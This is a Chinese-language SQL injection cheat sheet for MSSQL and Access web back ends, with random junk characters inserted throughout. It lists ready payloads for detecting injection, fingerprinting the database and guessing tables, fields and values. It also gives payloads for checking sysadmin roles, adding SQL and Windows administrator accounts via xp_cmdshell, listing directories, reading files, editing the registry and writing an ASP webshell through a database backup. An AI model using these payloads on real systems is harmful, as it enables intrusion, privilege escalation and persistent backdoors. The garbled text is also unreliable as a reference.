1.判断是否有注入;and 1=1 ;and 1=2 okBaQH2lUl
2.初步判断是否是mssql ;and user>0 "':SWKuMx
~0 L:c&V
3.注入参数是字符'and [查询条件] and ''=' #3-hE
z|zd=3c
4.搜索时没过滤参数的'and [查询条件] and '%25'=' (9+N_dLx~P
I!~3xZ
5.判断数据库系统 5pq9x4&
3\5I4#S
;and (select count(*) from sysobjects)>0 mssql z_:r&UP`"
z2SR/[I?
;and (select count(*) from msysobjects)>0 access m8&XW2S
WZ
,t~TN
D 6F/9|
,>I_2mc
6.猜数据库 ;and (select Count(*) from [数据库名])>0 a0cW=0l=
iBqIV
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 /gE9 W
w1t0X{
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 !)uXCg9U
D o!]t7Y$
9.(1)猜字段的ascii值(access) Q8bn|#`
6hqqZ
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 T!Uf
PfEI
jHc/ EZB
(2)猜字段的ascii值(mssql) [.4D<}e
xf8.PqVNo
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 E>qe hs,g
Bzr}+J
10.测试权限结构(mssql)
58/\
2Zw]Uu`sb
su Z`
/S%!{;:
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- |r53>,oR<:
6
ZVD<C :\
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- |(R[5q
ZRCUM"R_
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- %l)~C%T
r A9Rz^;xa
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- qAuq2pHA+d
v5`Odbc=w
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Tq5F'@e
Q9
RCN<!
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- c]:@y"W5$
IeJ@G)
;and 1=(select IS_MEMBER('db_owner'));-- "C [uz&
]\:l><
PX,fg5s\b
"yxBD
7
11.添加mssql和系统的帐户 e
irRAU
n/GJ&qLi:g
;exec master.dbo.sp_addlogin username;--
%Lgfi
;exec master.dbo.sp_password null,username,password;-- s B!2't
`jCq`-.
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- SlUt&+)
s&qr2'F+z
;exec master.dbo.xp_cmdshell 'net user username password &bS!>_9
TWTRMc;z+
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- R$VeD1n@
~7&O[
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ki|w?0s
7)au#K6
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Cl3hpqv1I
c)=UX_S!
[KwwhI@3
QjwCY=PK!
12.(1)遍历目录 ]ch=D
W[j7Vi8v
;create table dirs(paths varchar(100), id int) XY`2>7
.Dg'MMBM
;insert dirs exec master.dbo.xp_dirtree 'c:\' x$tzq+N
g].hL
;and (select top 1 paths from dirs)>0 =;A~$[ g
Voc&T+A m
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) _fANl}Mf:
RlTVx:
WWYG>C[
F`YxH*tO7
(2)遍历目录 Z'z~40Bda
S~ 3|
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- )Z2t=&Nw
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 <0I=XsE1iX
quw:4W>
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Li\BRlebR{
E.~~.2
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 uu582%tiG
B 9AE*
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Sf0[^"7
:7Q,
`W9
|qsY0zx
o] 7U;W
13.mssql中的存储过程 R!LKGiN
ss>?fyA
xp_regenumvalues 注册表根键, 子键 uP[:P?,t
-d6*M*{|
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 L #l|}u
? /Z
hu
xp_regread 根键,子键,键值名 4\yKd8I
1)m&6:!b
;exec xp_regread C\dlQQ
F
/:2+
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 >#\&%0OZw
TID0x/j"K5
xp_regwrite 根键,子键, 值名, 值类型, 值 }ZWeb#\
o(@F37r{?
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 l?%U*~*
!Rw\k'<GKX
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 (&u)FB*
m=<;)
xp_regdeletevalue 根键,子键,值名 XL7jUi_4:L
n`hes_{,g
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 'u2Qq"d+
H;n(qBSB
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 4x:Odt5
=`]yq;(C7j
cAc i2e
~L'}!'
&.
14.mssql的backup创建webshell v+*l|!v
}`9}Q
O
use model r8~U@$BBK
2O5yS
create table cmd(str image); Aq{m42EAj
P!";$]+
insert into cmd(str) values (''); _9Ig`?<>I
f(E 'i>
backup database model to disk='c:\l.asp'; rXz,<^Hmj
Ucnit^,
!Jj=H()}
YtrMJ"
15.mssql内置函数 VRoeq {
G#! j`
;and (select @@version)>0 获得Windows的版本号 '4A8\&lQO
cZ7b$MZ%9
;and user_name()='dbo' 判断当前系统的连接用户是不是sa -j9R%+YW<
Q'^]lVY
;and (select user_name())>0 爆当前系统的连接用户 -~h2^Oez
.j4IW3)
;and (select db_name())>0 得到当前连接的数据库 5aTyM_x
O ,[aL;v
X3Vpxtb
n.y72-&v
16.简洁的webshell AsM""x1Ix
hGF(E*
use model viBf".
2Xgw7`
!L
create table cmd(str image); .{-8gAh
UgJ^NF2w
insert into cmd(str) values (''); 1p&?MxLN-a
<96ih$5D1
backup database model to disk='g:\wwwtest\l.asp';